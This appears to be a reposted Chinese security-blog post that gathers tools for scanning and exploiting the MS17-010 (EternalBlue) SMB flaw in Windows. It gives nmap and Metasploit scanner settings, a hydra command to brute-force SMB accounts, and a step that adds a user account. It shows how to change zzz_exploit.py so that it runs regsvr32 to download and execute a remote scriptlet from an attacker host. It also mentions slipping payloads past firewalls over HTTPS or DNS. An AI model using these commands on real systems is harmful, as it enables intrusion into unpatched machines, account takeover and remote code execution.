Dragon
adminAdmin  2019-01-31 09:45 来源 隐藏边栏 |   抢沙发  489 
文章评分 0 次,平均分 0.0

扫描脚本汇总

PHP 脚本:

批量扫描:

https://github.com/lsh4ck/ms17-010-m4ss-sc4nn3r

MSF 的:

或者也可以:

smb_ms17_010.rb 缺省只扫 445/TCP。如果想扫 139/TCP,必须:

set SMBDirect false
set RPORT 139
或者

unset SMBDirect
set RPORT 139

NMAP 的:

nmap --script smb-vuln-ms17-010 -p445 x.x.x.x

漏洞利用

worawit/MS17-010

https://github.com/worawit/MS17-010
这个脚本其实在 nas 放出一个月就公开再 Exploit-db 了,很多人估计都不知道..
那么,查看 zzz_exploit.py 脚本会看到 from mysmb import MYSMB 之前有人使用 python 钓鱼:mysmb,其实真正安装了这个模块的人其实这个脚本反倒会利用失败.并且把信息发送给钓鱼者

依赖项

pipe

经常执行脚本会发现报错.如下所示

你可能需要的 pipe

那么直接通过 python zzz_exploit.py <ip> [pipe_name] 即可
当然有些时候没有设置 username 和 password,并且共享中启动了密码访问..也会导致这个问题

或者可以通过
auxiliary/scanner/smb/pipe_auditor 模块找寻你需要的 pipe

username and password

USERNAME = ''
PASSWORD = ''
只需要更改系统中存在的共享 smb 账户,无论权限多低

那么我们怎么找到对应的账户呢,使用如下两种,当然使用自己写 python 脚本更佳啊

hydra -L user.txt -P pass.txt -t 20 10.10.10.10 smb

注意: 此脚本最关键地方

如果测试成功,会发现 c 盘新建了一个 pwned.txt 文件,同时会执行命令net user test test /add

如果觉得繁琐,可以用 powershell/regsvr32 等等执行脚本内容

在 python 代码更改成如下即可

service_exec(conn, r'cmd /c regsvr32 /s /n /u /i:http://192.168.2.164:8080/5Msr8HdNh.sct scrobj.dll')

Eternalblue-Doublepulsar-Metasploit

https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/

修改 eternalblue_doublepulsar.rb 中成自己的目录,修改完成后,我们将 rb 文件放到 metasploit 的目录 exploit/windows/smb/


启动 msf 后使用reload_all命令重新加载模块


ms17_010_eternalblue

至于防火墙可以通过 https 和 dns 的 payload 走就行了


ms17_010_psexec

全版本通杀,至于为什么.因为有依赖条件.必须是禁止密码保护共享的

本文参考此文整理



  

本文转载自来源,本文观点不代表lsh4ck's Blog立场,版权归原作者所有,欢迎分享本文,转载请保留出处!

admin
Admin 关注:0    粉丝:3
这个人很懒,什么都没写

发表评论

表情 链接 私密 格式 签到

切换注册

登录

短信快捷登录 忘记密码 ?

切换登录

注册

验证码

×

感谢您对admin的支持,么么哒~

支付宝打赏 admin
请扫码随意打赏

打开支付宝扫一扫,即可进行扫码打赏哦

lsh4ck's Blog - Hacking is endless! Focus on network security!

扫一扫二维码分享

无觅相关文章插件,快速提升流量